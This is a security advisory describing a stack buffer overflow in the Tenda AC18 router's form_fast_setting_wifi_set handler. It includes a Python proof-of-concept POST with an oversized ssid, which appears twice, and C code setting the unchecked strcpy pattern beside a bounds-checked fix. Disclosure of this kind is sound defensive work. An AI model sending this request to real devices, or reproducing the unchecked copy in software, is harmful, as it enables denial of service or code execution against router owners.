Tenda AC18 V15.03.3.10_EN
The Tenda AC18 V15.03.3.10_EN has a stack overflow vulnerability in the `form_fast_setting_wifi_set` function. The `src` variable receives the `ssid` parameter from a POST request and is later copied into the `s` and `dest` variables. Because the user controls the value of `ssid`, the statements `strcpy(s, src);` and `strcpy(dest, src);` lead to a buffer overflow: there is no size check, so the user-provided `ssid` can exceed the allocated size of the `s` and `dest` arrays. The attacker can easily perform a Denial of Service attack or Remote Code Execution with carefully crafted overflow data.
```python
# form_fast_setting_wifi_set
import requests

ip = '192.168.0.100:80'
url = f"http://{ip}/goform/fast_setting_wifi_set"
# ssid of 0x100 bytes, which the handler copies with strcpy and no size check
data = {"ssid": 'a' * 0x100}
ret = requests.post(url, data)
```
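The unchecked copy described above, next to a length-checked version, as an added example that is not Tenda's code or the reporter's. The 64-byte buffer sizes and the function names are assumptions, since the page does not give the real sizes of `s` and `dest`; the 32-octet SSID limit comes from 802.11.

```c
#include <stdio.h>
#include <string.h>

/* Assumed sizes: the page does not state the real sizes of s and dest. */
#define S_SIZE    64
#define DEST_SIZE 64
#define SSID_MAX  32    /* 802.11 SSIDs are at most 32 octets */

/* Pattern described on the page: copies strlen(src)+1 bytes, whatever the buffer size. */
void set_ssid_unchecked(const char *src, char *s, char *dest)
{
    strcpy(s, src);
    strcpy(dest, src);
}

/* Length of p, reading at most max bytes (portable stand-in for strnlen). */
size_t bounded_len(const char *p, size_t max)
{
    size_t n = 0;
    while (n < max && p[n] != '\0')
        n++;
    return n;
}

/* Hypothetical hardened form: validate before copying.
 * Returns 0 on success, -1 if the value is missing or does not fit. */
int set_ssid_checked(const char *src, char *s, size_t s_size,
                     char *dest, size_t dest_size)
{
    size_t len;

    if (src == NULL || s == NULL || dest == NULL)
        return -1;
    len = bounded_len(src, SSID_MAX + 1);
    if (len > SSID_MAX || len + 1 > s_size || len + 1 > dest_size)
        return -1;                 /* reject instead of truncating or overflowing */
    memcpy(s, src, len + 1);       /* len + 1 includes the terminating NUL */
    memcpy(dest, src, len + 1);
    return 0;
}

int main(void)
{
    char s[S_SIZE], dest[DEST_SIZE], big[0x100 + 1];
    memset(big, 'a', 0x100);       /* constructed input, same length as the PoC value */
    big[0x100] = '\0';
    printf("0x100-byte ssid: %d\n", set_ssid_checked(big, s, sizeof s, dest, sizeof dest));
    printf("7-byte ssid:     %d\n", set_ssid_checked("HomeNet", s, sizeof s, dest, sizeof dest));
    return 0;
}
```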
###Product_version
Tenda AC18
V15.03.3.10_EN
###Affected_component
The "form_fast_setting_wifi_set" function of /bin/httpd
###Attack_vector
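A simple exploit is enough to trigger the overflow, like this:
```python
# python3
import requests

ip = '192.168.0.100:80'
url = f"http://{ip}/goform/fast_setting_wifi_set"
# ssid of 0x100 bytes, which the handler copies with strcpy and no size check
data = {"ssid": 'a' * 0x100}
ret = requests.post(url, data)
```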
###Description
Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the ssid parameter at ip/goform/fast_setting_wifi_set.
###Reference
<https://palm-vertebra-fe9.notion.site/form_fast_setting_wifi_set-fd47294cf4bb460bb95f804d39e53f34>
<https://www.tendacn.com/hk/download/detail-3863.html>
<https://www.tendacn.com/hk/download/detail-3852.html>